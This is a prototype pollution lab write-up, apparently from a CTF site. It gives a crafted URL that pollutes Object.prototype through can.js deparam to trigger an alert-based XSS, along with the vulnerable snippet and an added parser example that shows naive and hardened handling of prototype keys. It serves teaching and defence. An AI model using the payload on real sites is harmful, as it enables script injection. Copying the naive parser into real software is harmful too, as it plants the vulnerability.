Prototype Pollution Lab

Navigate to

http://ctf.m3.wtf/pplab3.html?__proto__[srcdoc]=<img%20src%20onerror%3dalert(document.domain)>

You should see an alert pop up.

By combining a "less useless" prototype pollution with a gadget, we have achieved XSS: since we could control properties on Object.prototype, we set srcdoc to our own markup, which the gadget then picked up.

The code snippet used in this lab is below.

<script src="https://www.google.com/recaptcha/api.js?render=6LeaqxYbAAAAAF_-OJc1v8VAuRgMg8sK-SRwVAUQ"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/can.js/6.6.0/core.min.js"></script>
<script>
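  // Parses the query string into an object; bracketed keys such as __proto__[srcdoc] are followed into Object.prototype
  can.deparam(location.search.slice(1))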
</script>
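
As an added example (not code from the lab or from can.js), the simplified bracket-notation query parser below shows why a key like `__proto__[srcdoc]` reaches `Object.prototype`, next to a hardened mode that drops such keys and builds on null-prototype objects. The names `parseQuery`, `keyPath`, `demo` and the sample query string are assumptions made for illustration.

```javascript
// Added example: simplified bracket-notation query parser (hypothetical, NOT can.js source).
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Split "a[b][c]" into ["a", "b", "c"].
function keyPath(rawKey) {
  return rawKey.split(/[\[\]]+/).filter(Boolean);
}

// safe=false behaves like a naive deparam; safe=true is the hardened variant.
function parseQuery(query, { safe }) {
  const result = safe ? Object.create(null) : {};
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const rawKey = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const value = decodeURIComponent(eq < 0 ? '' : pair.slice(eq + 1));
    const path = keyPath(rawKey);
    if (path.length === 0) continue;
    // Hardened mode: reject the whole parameter if any segment names a prototype key.
    if (safe && path.some((k) => BLOCKED.has(k))) continue;
    let node = result;
    for (const key of path.slice(0, -1)) {
      // Naive mode: node['__proto__'] already exists (it is Object.prototype),
      // so the walk steps into the shared prototype instead of a fresh object.
      if (typeof node[key] !== 'object' || node[key] === null) {
        node[key] = safe ? Object.create(null) : {};
      }
      node = node[key];
    }
    node[path[path.length - 1]] = value;
  }
  return result;
}

// Runs both modes on a constructed query and reports whether unrelated objects were affected.
function demo() {
  const query = '__proto__[srcdoc]=MARKER&page=2'; // constructed sample input
  parseQuery(query, { safe: false });
  const pollutedByUnsafe = ({}).srcdoc === 'MARKER'; // a brand-new object inherits the value
  delete Object.prototype.srcdoc; // reset global state before the second run
  const parsed = parseQuery(query, { safe: true });
  const pollutedBySafe = 'srcdoc' in {};
  return { pollutedByUnsafe, pollutedBySafe, page: parsed.page };
}

console.log(demo());
```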

Writeup & Vulnerable Code Snippet 1
Writeup & Vulnerable Code Snippet 2